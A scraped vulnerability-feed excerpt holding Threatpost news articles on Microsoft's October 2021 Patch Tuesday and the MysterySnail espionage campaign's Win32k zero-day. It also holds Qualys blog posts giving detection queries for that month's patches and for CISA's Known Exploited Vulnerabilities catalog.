left unpatched, \u201cMysterySnail has the potential to collect and exfiltrate system information from compromised hosts, in addition to other malicious users having the ability to gain complete control of the affected system and launch further attacks.\u201d\n\nJay Goodman, Automox director of product marketing, told Threatpost via email that these kinds of privilege elevation attacks \u201ccan be used to access beyond what the current user context of the device would allow, enabling attackers to perform unauthorized action, delete or move data, view private information, or install malicious software.\u201d\n\nThis bug, rated Important, is found in all supported versions of Windows.\n\nGreg Wiseman, Rapid7 senior security researcher, told Threatpost that this vulnerability is \u201clikely being used alongside Remote Code Execution (RCE) and/or social engineering attacks to gain more complete control of targeted systems.\u201d\n\nSatnam Narang, staff research engineer at Tenable, noted that elevation of privilege flaws \u201care most valuable in post-compromise scenarios once an attacker has gained access to a target system through other means, in order to execute code with elevated privileges.\u201d\n\nImmersive Labs\u2019 Kevin Breen, director of cyber threat research, said that this all points to prioritizing this patch, particularly given how common these vulnerabilities are in ransomware attack chains: \u201cGaining this level of access on a compromised host is the first step towards becoming a domain admin \u2013 and securing full access to a network,\u201d he told Threastpost. \u201cAlmost every ransomware attack reported this year has included the use of one or more privilege escalation vulnerabilities as part of the attacker\u2019s workflow, so this is serious stuff indeed.\u201d\n\n## A PrintNightmare Fix to Fix the Other PrintNightmare Fix\n\nOther fixes released in the October Patch Tuesday batch include those that address what was a summer\u2019s full of Print Spooler-related patches. There\u2019s been a [steady](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>) [stream](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>) of these [patches](<https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/>) for flaws in Windows Print Spooler following June\u2019s [disclosure of the PrintNightmare vulnerability](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>) \u2013 a bug that allowed threat actors to conduct remote code execution (RCE) and to gain local system privileges.\n\nThis month\u2019s release includes a fix for [CVE-2021-36970](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36970>), a spoofing vulnerability in Microsoft\u2019s Windows Print Spooler that has a CVSSv3 score of 8.8.\n\nChris Morgan, senior cyber threat intelligence analyst at Digital Shadows, said that the spoofing vulnerability fix Microsoft put out today is meant to fix the problems that previous patches have introduced.\n\n\u201cWhile Microsoft provided a fix in [their September 2021 update,](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>) the patch resulted in a number of management problems,\u201d he told Threatpost. \u201cCertain printers required users to repeatedly input their administrator credentials every time an application attempted to print or had a client connect to a print server.\n\n\u201cOther problems included event logs recording error messages and denying users the ability to perform basic prints\u201d he continued. \u201cAs a result, many may have likely skipped the update due to its operational impact, ultimately leaving the risk posed by PrintNightmare in place.\u201d\n\nThis vulnerability was discovered by researchers XueFeng Li and Zhiniang Peng of Sangfor, who were also credited with the discovery of CVE-2021-1675, one of two vulnerabilities known as PrintNightmare.\n\nSatnam Narang, staff research engineer at Tenable noted that \u201cWhile no details have been shared publicly about the flaw, this is definitely one to watch for, as we saw a constant stream of Print Spooler-related vulnerabilities patched over the summer while ransomware groups began incorporating PrintNightmare into their affiliate playbook. We strongly encourage organizations to apply these patches as soon as possible.\u201d\n\n## RCE Affects Microsoft Word, Office, SharePoint\n\nAnother vulnerability worth noting is CVE-2021-40486, a critical RCE affecting Microsoft Word, Microsoft Office and some versions of SharePoint Server that can be exploited via the Preview Pane.\n\nGina Geisel, Automox product and partner marketing professional, noted that this vulnerability isn\u2019t new to Microsoft, with several other similar CVEs documented this year. In this case, the RCE vulnerability exists in some Microsoft apps when they fail to properly handle objects in memory.\n\nWith a low attack complexity, this vulnerability requires a user opening a specially crafted file either by email or via a website, either hosted by the attacker or through a compromised website that accepts or hosts user-provided content.\n\n\u201cAn attacker who successfully exploits this vulnerability can use this file to perform actions in the context of the current user,\u201d Geisel explained. \u201cFor example, the file could take actions on behalf of the logged-on user with the same permissions as the current user.\u201d\n\n## Microsoft SharePoint Server RCE\n\nImmersive Labs\u2019 Breen told Threatpost that this RCE vulnerability \u2013 tracked as [CVE-2021-40487](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40487>) rated as 8.1 out of 10 CVSS score and marked as \u201cexploitation more likely\u201d \u2013 will be more difficult for an attacker to exploit, given that it requires an authenticated user on the domain.\n\nBut gaining RCE on a SharePoint server \u201copens up a lot of avenues for further exploitation,\u201d he noted via email.\n\n\u201cInternal SharePoint servers are often used to host company-sensitive documents and provide an intranet for staff to interact with,\u201d Breen explained. \u201cIf an attacker could manipulate the content of these articles or replace valid documents with malicious ones, they could steal credentials or trick targeted users into installing additional malware.\u201d\n\n## Highest CVSS Award Goes to Microsoft Exchange Server RCE\n\n[CVE-2021-26427](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26427>), the latest in Exchange Server RCEs, takes the severity cake this month, with a CVSS score of 9.0 out of 10. In spite of this hgh severity rating, Microsoft has marked it as being \u201cexploitation less likely,\u201d perhaps due to the what Breen called the \u201cnetwork adjacent vector.\u201d\n\nIn other words, he explained, \u201can attacker would already need access to your network in order to exploit this vulnerability. Email servers will always be prime targets, simply due to the amount of data contained in emails and the range of possible ways attackers could use them for malicious purposes.\u201d\n\nWhile it\u2019s not \u201cright at the top\u201d of Breen\u2019s list of priorities to patch, \u201cit\u2019s certainly one to be wary of.\u201d\n\nRapid7\u2019s Wiseman concurs: This is a notable vulnerability, though it\u2019s mitigated \u201cby the fact that attacks are limited to a \u2018logically adjacent topology,'\u201d meaning, in other words, that it can\u2019t be exploited directly over the public Internet.\n\n## Windows Hyper-V\n\nWiseman called on virtualization administrators to take heed of two RCEs affecting Windows Hyper-V: [CVE-2021-40461](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40461>) and [CVE-2021-38672](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38672>), both of which affect relatively new versions of Windows and which are considered critical.\n\nWindows Hyper-V is a native hypervisor that can create and run virtual machines (VMs) on x86-64 systems running Windows. These two flaws both allow a VM to escape from guest to host by triggering a memory allocation error, allowing it to read kernel memory in the host.\n\nChristopher Hass, Autmox director of information security and research, said that exploitation of these bugs \u201ccould allow a malicious guest VM to read kernel memory in the host.\u201d\n\nNeither vulnerability has been exploited publicly, and exploitation is less likely, however organizations using Hyper-V should patch these vulnerabilities as soon as possible, Hass recommended.\n\n## One Step Away From Domain Admin\n\nThere\u2019s one bug that swings above its weight range: the DNS server remote code execution (RCE) vulnerability that\u2019s tracked as [CVE-2021-40469](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40469>).\n\nJake Williams, Co-Founder and CTO at BreachQuest, calls this one \u201cinteresting,\u201d as in, that curse about [living in interesting times](<https://en.wikipedia.org/wiki/May_you_live_in_interesting_times>).\n\nIts base score severity rating is 7.2, but its attack complexity is low, and an attack can be launched remotely. Exploitation does, however, require what [VulDB](<https://vuldb.com/?id.184280>) calls \u201can enhanced level of successful authentication.\u201d\n\nEven if that makes it tough to weaponize, this bug is still potentially uber nasty, given that, for one thing, it\u2019s been publicly disclosed in a proof of concept, and also that DNS servers sit in such a crucial spot.\n\n\u201cWhile it will likely be difficult to weaponize, DNS servers are typically run on domain controllers, making this extremely serious,\u201d Williams noted. \u201cA threat actor that gains remote code execution on a domain controller is likely to gain immediate domain administrator permissions. In the best case scenario, they are a mere step away from taking domain administrator.\u201d\n\nThis isn\u2019t the first time that Microsoft has had to stomp on an RCE vulnerability in DNS server this year, including in [March\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/>). This time around, the vulnerability affects various versions of Windows 7, 8.1 and 10, as well as Windows Server.\n\n## Windows Kernel Elevation of Privilege Flaw\n\nCVE-2021-41335, an elevation of privilege vulnerability that exists when the Windows kernel fails to properly handle objects in memory, is rated high severity, and it\u2019s been publicly disclosed in a proof-of-concept (POC) showing how successful exploitation could allow an attacker to run arbitrary code in kernel mode.\n\nExploitation would enable an attacker to install programs; view, change, or delete data; or create accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system and then run a specially crafted application to take control of the system.\n\nJustin Knapp, Automox senior product marketing manager, explained that \u201cElevation of privilege vulnerabilities like this are often an important step in the cyber kill chain and should be immediately prioritized and patched.\u201d\n\n## Windows AppContainer Firewall Rules Security Feature Bypass\n\nTracked as [CVE-2021-41338](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41338>), this vulnerability is, again, high severity \u2013 it allows an attacker to bypass the security rules of Windows AppContainer Firewall \u2013 as well as publicly disclosed.\n\nAppContainers are designed to protect against infiltration from third-party apps. They essentially isolate the runtime environment of applications with the goal of blocking malicious code.\n\nThis vulnerability results in loss of confidentiality and can be exploited without any user interaction.\n\nMaarten Buis, Automox product marketing manager, noted that a successful attacker that exploits this vulnerability could run arbitrary code on the endpoint, but they need to have administrative privileges before they can meaningfully exploit it.\n\n\u201cHowever, there is still a significant risk because no user interaction is required, and no special endpoint conditions are required for an attack to succeed,\u201d Buis explained to Threatpost via email .\n\nThere are no reports of the vulnerability having been actively exploited \u2013 yet. Still, Automox recommends a rapid patch rollout \u2013 as in, within 72 hours of the patch being made available \u2013 given that it\u2019s been publicly disclosed in a proof of concept by James Forshaw of Google\u2019s Project Zero.\n\nAleks Haugom, Automox product marketing manager, noted that, given the sheer number of apps users download, \u201cmaking sure that AppContianers cannot be compromised is important to every company\u2019s security hygiene.\u201d\n\n## How to Prioritize?\n\nWilliams said that he doesn\u2019t want to sound like a broken record, but he\u2019s still going to say what security experts say every Patch Tuesday. To wit, \u201cPatch now.\u201d\n\nThat\u2019s particularly true for the MysterySnail campaign, he said: \u201cSeriously, this is not a patch Tuesday to delay on,\u201d he advised. \u201cThreat actors are actively exploiting the vulnerability for CVE-2021-40449 to elevate from user to administrator permissions on compromised systems. While CVE-2021-40449 doesn\u2019t allow for remote exploitation, that doesn\u2019t mean it can be taken lightly. Threat actors regularly gain access to target machines using phishing attacks and vulnerabilities such as CVE-2021-40449 allow them to evade more effectively bypass endpoint controls and evade detection.\u201d\n\nBesides which, MysterySnail\u2019s success in weaponizing this flaw means that other APTs will soon follow, Williams said: \u201cBecause the code for this has already been weaponized by one threat actor, we should expect to see it weaponized by others more quickly because there is already sample exploit code in the wild to work with.\u201d\n\nDanny Kim, Principle Architect at Virsec, who spent time at Microsoft during his graduate work on the OS security development team, voted for prioritizing the three critical remote code execution vulnerabilities: CVE-2021-40469, CVE-2021-26427 and CVE-2021-40487, which affect a wide range of Windows versions.\n\n\u201cThese vulnerabilities not only have a high to critical CVSS rating, but two of the three attacks (CVE-2021-40487, CVE-2021-40469) can be executed remotely,\u201d he stressed. \u201cRemote Code Execution (RCE) attacks are especially devastating because once the exploit is executed, [the attackers] can launch any kind of cyberattack, including ransomware.\n\nHe noted that RCE vulnerabilities were also the root cause of the Hafnium and Kaseya attacks. \u201cTrying to mitigate the attacker\u2019s actions after they have gained access is significantly harder than stopping the actions that led to the successful exploit,\u201d Kim pointed out. \u201cThis is why runtime monitoring of enterprises\u2019 server workloads is becoming a key part of today\u2019s cybersecurity. Stopping the exploitation of these vulnerabilities has to start with equipping the servers themselves with constant, deterministic runtime protection, not just detection.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T21:51:06", "type": "threatpost", "title": "Microsoft Oct. Patch Tuesday Squashes 4 Zero-Day Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26427", "CVE-2021-36970", "CVE-2021-38672", "CVE-2021-40449", "CVE-2021-40461", "CVE-2021-40469", "CVE-2021-40486", "CVE-2021-40487", "CVE-2021-41335", "CVE-2021-41338"], "modified": "2021-10-12T21:51:06", "id": "THREATPOST:500777B41EEA368E3AC2A6AED65C4A25", "href": "https://threatpost.com/microsoft-patch-tuesday-bug-exploited-mysterysnail-espionage-campaign/175431/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-13T10:46:14", "description": "Researchers have discovered a zero-day exploit for Microsoft Windows that was being used to elevate privileges and take over Windows servers as part of a Chinese-speaking advanced persistent threat (APT) espionage campaign this summer. The exploit chain ended with a freshly discovered remote access trojan (RAT) dubbed MysterySnail being installed on compromised servers, with the goal of stealing data.\n\nMicrosoft patched the bug (CVE-2021-40449) as part of its October Patch Tuesday updates, [issued this week.](<https://threatpost.com/microsoft-patch-tuesday-bug-exploited-mysterysnail-espionage-campaign/175431/>)\n\nAccording to a [Tuesday analysis](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>) from Kaspersky researchers, the issue lurks in the Win32k kernel driver. It\u2019s a use-after-free vulnerability, and \u201cthe root cause of this vulnerability lies in the ability to set user-mode callbacks and execute unexpected API functions during execution of those callbacks,\u201d they explained. \u201cThe CVE-2021-40449 is triggered when the function ResetDC is executed a second time for the same handle during execution of its own callback.\u201d\n\nThis ultimately results in a dangling memory pointer that points to a previously destroyed Proactive Data Container (PDC) object, according to Kaspersky. That means that a malformed PDC object can be used to perform a call to an arbitrary kernel function, and from there allows attackers to read and write kernel memory.\n\n\u201cIt\u2019s possible to use publicly known techniques to leak kernel addresses of currently loaded drivers/kernel modules,\u201d researchers said.\n\n## **MysterySnail RAT in Action**\n\nAs mentioned, the cybercriminals were using the exploit as part of a wider effort to install a remote shell on target servers, i.e., the MysterySnail malware, which was unknown prior to this campaign.\n\nKaspersky researchers said that the sample that they analyzed clocked in at a sizable 8.29MB, which immediately caught their notice.\n\n\u201cOne of the reasons for the file size is that it\u2019s statically compiled with the OpenSSL library and contains unused code and data belonging to that library,\u201d they explained. \u201cBut the main reason for its size is the presence of two very large functions that do nothing but waste processor clock cycles. These functions also use randomly generated strings that are also present in a binary.\u201d\n\nThese are likely anti-analysis functions, they added, noting that the code also contains other redundant logics and \u201cthe presence of a relatively large number of exported functions while the real work is performed by only one of them.\u201d\n\nThe function responsible for executing the actual activities of the malware is called \u201cGetInfo,\u201d according to the analysis.\n\nThe malware decodes the command-and-control (C2) address and attempts to connect to it. It also requests tunneling through a proxy server in case it fails to connect to the C2 directly.\n\nFrom there, the malware gathers basic information about the victim machine: computer name, current OEM code-page/default identifier, Windows product name, local IP address, logged-in user name and campaign name.\n\n\u201cOne interesting fact is that \u2018campaign name\u2019 by default is set to Windows,\u201d according to the researchers. \u201cThis name gets overwritten, but it might indicate there are versions of the same RAT compiled for other platforms.\u201d\n\nThen it awaits encrypted commands from the C2. It supports 20 of them. These are:\n\n * Launch interactive cmd.exe shell. Before launch cmd.exe is copied to the temp folder with a different name\n * Spawn new process\n * Spawn new process (console)\n * Get existing disk drives and their type. This function also works in the background, checking for new drives\n * Create (upload) new file. If a file exists, append data to it\n * Get directory list\n * Kill arbitrary process\n * Delete file\n * Read file\n * Re-connect\n * Set sleep time (in milliseconds)\n * Shutdown network and exit\n * Exit\n * Kill interactive shell\n * Terminate file-reading operation\n * No operation\n * Open proxied connection to provided host. Up to 50 simultaneous connections are supported.\n * Send data to proxied connection\n * Close all proxy connections\n * Close requested proxy connection\n\n\u201cThe malware itself is not very sophisticated and has functionality similar to many other remote shells,\u201d researchers noted. \u201cBut it still somehow stands out, with a relatively large number of implemented commands and extra capabilities like monitoring for inserted disk drives and the ability to act as a proxy.\u201d\n\n## **Link to IronHusky**\n\nDuring Kaspersky\u2019s analysis of the MysterySnail RAT, they linked the campaign with the IronHusky group APT activity thanks to the reuse of C2 infrastructure used in other attacks, dating back to 2012.\n\nThey also discovered other campaigns from this year that used earlier variants of the malware, which also helped tie it to the China-based APT known as IronHusky.\n\n\u201cWe were able to find direct code and functionality overlap with the malware attributed to the IronHusky actor,\u201d researchers said. \u201cWe were also able to discover the re-use of C2 addresses used in attacks by the Chinese-speaking APT as far back as 2012. This discovery links IronHusky to some of the older known activities.\u201d\n\nIronHusky was first detected in summer 2017, and it has a history of using exploits to deliver RATs to targets. In 2017, for instance, Kaspersky discovered the group exploiting CVE-2017-11882 to spread the common PlugX and PoisonIvy RATs.\n\n\u201cIt is very focused on tracking the geopolitical agenda of targets in central Asia with a special focus in Mongolia, which seems to be an unusual target,\u201d the firm noted [in its report](<https://securelist.com/apt-trends-report-q1-2018/85280/>) on the activity. \u201cThis actor crafts campaigns for upcoming events of interest. In this case, they prepared and launched one right before a meeting with the International Monetary Fund and the Mongolian government at the end of January 2018. At the same time, they stopped their previous operations targeting Russian military contractors, which speaks volumes about the group\u2019s limitations.\u201d\n\nThe latest attacks have been targeted but extensive. Kaspersky researchers found variants of MysterySnail used in widespread espionage campaigns against IT companies, military and defense contractors, and diplomatic entities, according to the writeup.\n\n_**Check out our free **_[_**upcoming live and on-demand online **_](<https://threatpost.com/category/webinars/>)_**_town halls_**__** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T19:34:32", "type": "threatpost", "title": "Windows Zero-Day Actively Exploited in Widespread Espionage Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2021-40449"], "modified": "2021-10-12T19:34:32", "id": "THREATPOST:8836AC81C1F2D9654424EC1584E50A16", "href": "https://threatpost.com/windows-zero-day-exploited-espionage/175432/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-10-20T09:07:46", "description": "### Microsoft Patch Tuesday \u2013 October 2021\n\nMicrosoft patched 74 vulnerabilities in their October 2021 Patch Tuesday release, of which three are rated as critical severity and four were previously reported as zero-days.\n\n### Critical Microsoft Vulnerabilities Patched\n\n[CVE-2021-40449](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40449>) - Win32k Elevation of Privilege Vulnerability\n\nThis was a zero-day, and one of the four addressed by Microsoft this month. This vulnerability impacts the Win32K kernel driver. This is being actively exploited by IronHusky and Chinese APT groups. Microsoft has assigned a CVSSv3 base score of 7.8 to this vulnerability and it should be prioritized for patching.\n\n[CVE-2021- 40486](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40486>) \u2013 Microsoft Word Remote Code Execution Vulnerability\n\nThis vulnerability is due to improper input validation in Microsoft Word. Adversaries can exploit this vulnerability by tricking target users to open a specially crafted file and perform arbitrary code execution. Microsoft has assigned a CVSSv3 base score of 7.8 to this vulnerability.\n\n[CVE-2021-40461, CVE-2021-38672](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38672>)- Windows Hyper-V Remote Code Execution Vulnerabilities\n\nThese vulnerabilities are due to a set of flaws in the Network Virtualization Service Provider. They could allow an attacker to execute remote code on the target machine. These CVEs are assigned a CVSSv3 base score of 8.0 by the vendor.\n\n[CVE-2021-26427](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26427>): Microsoft Exchange Server Remote Code Execution Vulnerability\n\nThis is an RCE vulnerability targeting Microsoft Exchange Server. Adversaries can only exploit this vulnerability on target machines from an adjacent network. Microsoft assigned a base score of 9.0 for this vulnerability.\n\n#### Following were the three of the four zero-day vulnerabilities\n\nCVE-2021-41338: Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability\n\nCVE-2021-40469: Windows DNS Server Remote Code Execution Vulnerability\n\nCVE-2021-41335: Windows Kernel Elevation of Privilege Vulnerability\n\n### Adobe Patch Tuesday \u2013 October 2021\n\nAdobe addressed 10 CVEs this [Patch Tuesday](<https://helpx.adobe.com/security.html>), and 6 of them are rated as critical severity impacting Acrobat and Reader, Adobe Connect, Opd-cli, Commerce, and Campaign products.\n\n### **Discover Patch Tuesday Vulnerabilities in VMDR**\n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:(qid:`50115` OR qid:`91822` OR qid:`91823` OR qid:`91824` OR qid:`91825` OR qid:`91826` OR qid:`91827` OR qid:`91828` OR qid:`100416` OR qid:`110392` OR qid:`110393` OR qid:`375952` OR qid:`375953`)\n\n\n\n### Respond by Patching \n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday.\n \n \n (qid:`50115` OR qid:`91822` OR qid:`91823` OR qid:`91824` OR qid:`91825` OR qid:`91826` OR qid:`91827` OR qid:`91828` OR qid:`100416` OR qid:`110392` OR qid:`110393` OR qid:`375952` OR qid:`375953`)\n\n\n\n### Patch Tuesday Dashboard\n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard](<https://success.qualys.com/discussions/s/article/000006505>).\n\n### **Webinar Series: This Month in Vulnerabilities and Patches**\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series [_T_](<https://event.on24.com/wcc/r/3411753/DC43289F29EF66CAE5CF62637F8CB6E3>)_[his Month in Vulnerabilities and Patches](<https://event.on24.com/wcc/r/3411753/DC43289F29EF66CAE5CF62637F8CB6E3>)_.\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them: \n\n * Microsoft Patch Tuesday, October 2021 \n * Adobe Patch Tuesday, October 2021 \n\n[Join us live or watch on demand!](<https://event.on24.com/wcc/r/3411753/DC43289F29EF66CAE5CF62637F8CB6E3>)\n\nThursday, October 14, 2021 or later on demand\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {}, "published": "2021-10-13T14:14:18", "type": "qualysblog", "title": "Microsoft & Adobe Patch Tuesday (October 2021) \u2013 Microsoft 74 Vulnerabilities with 3 Critical, 4 Zero-Days. Adobe 10 Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26427", "CVE-2021-38672", "CVE-2021-40449", "CVE-2021-40461", "CVE-2021-40469", "CVE-2021-40486", "CVE-2021-41335", "CVE-2021-41338"], "modified": "2021-10-13T14:14:18", "id": "QUALYSBLOG:2BC91C96B1F3F528B6AC9D1724739ED2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection &amp; Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:&quot;true&quot;_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n 